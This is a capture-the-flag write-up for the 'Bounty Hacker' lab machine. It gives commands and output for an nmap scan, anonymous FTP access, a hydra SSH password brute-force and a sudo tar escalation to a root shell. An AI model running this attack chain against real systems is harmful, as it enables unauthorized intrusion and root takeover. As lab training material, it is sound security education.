# Bounty Hacker Room Covers: * Service Discovery * Local Privilege Escalation ## Target Details * IP: 10.10.160.10 ## Service Discovery * Using nmap ```bash nmap -sV -sC -Pn -oN scan.txt 10.10.160.10 ``` * Scan Results ```bash # Nmap 7.92 scan initiated Thu Jun 30 12:36:54 2022 as: nmap -sC -sV -Pn -oN scan.txt 10.10.160.10 Nmap scan report for 10.10.160.10 Host is up (0.39s latency). Not shown: 967 filtered tcp ports (no-response), 30 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 | ftp-syst: | STAT: | FTP server status: | Connected to ::ffff:10.x.x.x | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 2 | vsFTPd 3.0.3 - secure, fast, stable |_End of status | ftp-anon: Anonymous FTP login allowed (FTP code 230) | -rw-rw-r-- 1 ftp ftp 418 Jun 07 2020 locks.txt |_-rw-rw-r-- 1 ftp ftp 68 Jun 07 2020 task.txt 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 dc:f8:df:a7:a6:00:6d:18:b0:70:2b:a5:aa:a6:14:3e (RSA) | 256 ec:c0:f2:d9:1e:6f:48:7d:38:9a:e3:bb:08:c4:0c:c9 (ECDSA) |_ 256 a4:1a:15:a5:d4:b1:cf:8f:16:50:3a:7d:d0:d8:13:c2 (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Site doesn't have a title (text/html). Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Thu Jun 30 12:37:34 2022 -- 1 IP address (1 host up) scanned in 40.35 seconds ``` * OS: Ubuntu * Services Found | Service | Port | Version | | :-----: | :--: | ------------- | | HTTP | 80 | Apache/2.4.18 | | FTP | 21 | vsftpd 3.0.3 | | SSH | 22 | OpenSSH 7.2p2 | ## Try Accessing FTP * Trying to access FTP anonymously ```bash Connected to 10.10.160.10. 220 (vsFTPd 3.0.3) Name (10.10.160.10:attacker): anonymous 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ``` * We get successfully logged in as anonymous user * list and download files ```bash # list files ftp> ls 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. -rw-rw-r-- 1 ftp ftp 418 Jun 07 2020 locks.txt -rw-rw-r-- 1 ftp ftp 68 Jun 07 2020 task.txt 226 Directory send OK. ftp> # download all files ftp> mget * . # press return key whenever prompted to download ``` * `locks.txt` file appears to be a wordlist ## Bruteforce SSH service * Assuming user to be lin from `task.txt` file, we bruteforce this account with downloaded `locks.txt` file ```bash hydra -l lin -P locks.txt ssh://10.10.160.10 ``` > Password: RedDr4gonxxxxxxxxx * We've successfully found the SSH password for user lin ## Login to SSH * Login Details | User | Password | | :--: | ------------------ | | lin | RedDr4gonxxxxxxxxx | * Login to SSH using above details ```bash ssh lin@10.10.160.10 ``` ## Privilege Escalation * Find SUID files ```bash find / -perm -u=s -type f 2>/dev/null ``` * `sudo` can be used by lin, hence to find commands that can be used by lin and executed as root, we run below command ```bash sudo -l Matching Defaults entries for lin on bountyhacker: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User lin may run the following commands on bountyhacker: (root) /bin/tar ``` > `/bin/tar` can be executed by lin as root * Searching for tar on [GTFObins](https://gtfobins.github.io/gtfobins/tar/#sudo), we can escalate privileges using below command ```bash sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh ``` * Machine is now rooted ```bash # whoami root ``` ## Get Flags * User Flag ```bash # cat /home/lin/Desktop/user.txt THM{CR1M3_xxxxxxxxx} ``` * Root Flag ```bash # cat /root/root.txt THM{80UN7Y_xxxxxx} ```